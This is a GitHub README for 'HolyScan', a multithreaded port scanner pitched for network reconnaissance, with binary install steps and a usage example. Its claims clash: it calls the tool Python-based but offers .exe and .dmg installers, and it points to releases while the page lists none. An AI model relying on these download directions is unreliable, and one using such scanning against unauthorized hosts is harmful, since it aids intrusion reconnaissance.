Skip to content

πŸ› οΈ Scan IP addresses for open ports quickly while using minimal system resources with HolyScan's efficient Python-based solution.

License

Notifications You must be signed in to change notification settings

ghostzaml/HolyScan

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

5 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ› οΈ HolyScan - Fast and Simple Port Scanning Tool

Download HolyScan

πŸš€ Getting Started

Welcome to HolyScan! This lightweight, multithreaded port scanner helps you quickly identify open ports and running services across IPs. It works efficiently across different platforms, making it a great tool for network reconnaissance.

πŸ” Features

  • Multithreading: Scan multiple IPs at once for faster results.
  • Platform-Independent: Use it on Windows, macOS, or Linux without issues.
  • Lightweight: Minimal resource usage while scanning.
  • Service Detection: Identifies services running on open ports.
  • Open Source: Contribute and improve the tool in the community.

πŸ“‹ System Requirements

  • Python 3.x installed on your device.
  • Works on any major OS: Windows, macOS, Linux.
  • At least 100 MB of free disk space for installation and operations.

πŸ“₯ Download & Install

To get started, visit the link below to access the Releases page where you can download HolyScan:

Visit this page to download HolyScan

  1. On the Releases page, look for the latest version.
  2. Click on the appropriate file for your operating system to start the download.
  3. Once downloaded, follow these steps to install and run HolyScan:

πŸ”§ Installation Steps

  • Windows:

    1. Locate the downloaded .exe file.
    2. Double-click the file to run the installer.
    3. Follow the prompts to complete the installation.
  • macOS:

    1. Open the downloaded .dmg file.
    2. Drag HolyScan to your Applications folder.
    3. Launch HolyScan from your Applications.
  • Linux:

    1. Open a terminal window.
    2. Change directory to the location of the downloaded file.
    3. Use the command chmod +x HolyScan to make the file executable.
    4. Run HolyScan using ./HolyScan.

βš™οΈ Usage Guide

After installation, you can start using HolyScan to scan IPs. Here’s how you can use it from your command line:

  1. Open your command line interface (Command Prompt, Terminal, etc.).

  2. Type the following command to scan an IP address:

    holyscan [IP_ADDRESS]
  3. Replace [IP_ADDRESS] with the actual IP you want to scan.

  4. Press Enter, and HolyScan will start scanning the specified IP and display the results.

Example Command:

To scan an example IP, use:

holyscan 192.168.1.1

🌐 Community & Support

If you need help or want to connect with others who use HolyScan, join our community discussions on GitHub or follow the issues page for updates and troubleshooting.

πŸ“œ License

HolyScan is open-source software licensed under the MIT License. Feel free to use and modify it.

πŸ”— Contact

For questions, suggestions, or contributions, you can reach out through the GitHub page or email the maintainer. Your feedback is appreciated!

Visit this page to download HolyScan

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages